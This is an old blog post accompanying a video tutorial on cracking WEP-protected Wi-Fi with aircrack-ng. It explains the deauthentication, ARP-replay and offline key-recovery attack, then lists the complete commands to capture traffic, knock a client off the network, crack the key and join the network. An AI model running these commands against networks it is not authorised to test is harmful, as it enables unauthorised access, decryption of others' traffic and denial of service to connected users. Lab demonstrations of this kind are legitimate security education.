Monday, June 7, 2010

[Video] Cracking WiFi - WEP with a client (aircrack-ng)

Watch video on-line:
Download video:

What is this?
Yet another video on "How to crack WEP".

How does this work?
ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).

Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)

From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode & injection

Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
Download Link:

airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0

aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

aircrack-ng output*.cap

ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0

If you want WPA/WPA2 PSK (with a hidden SSID) - See:

No comments:

Post a Comment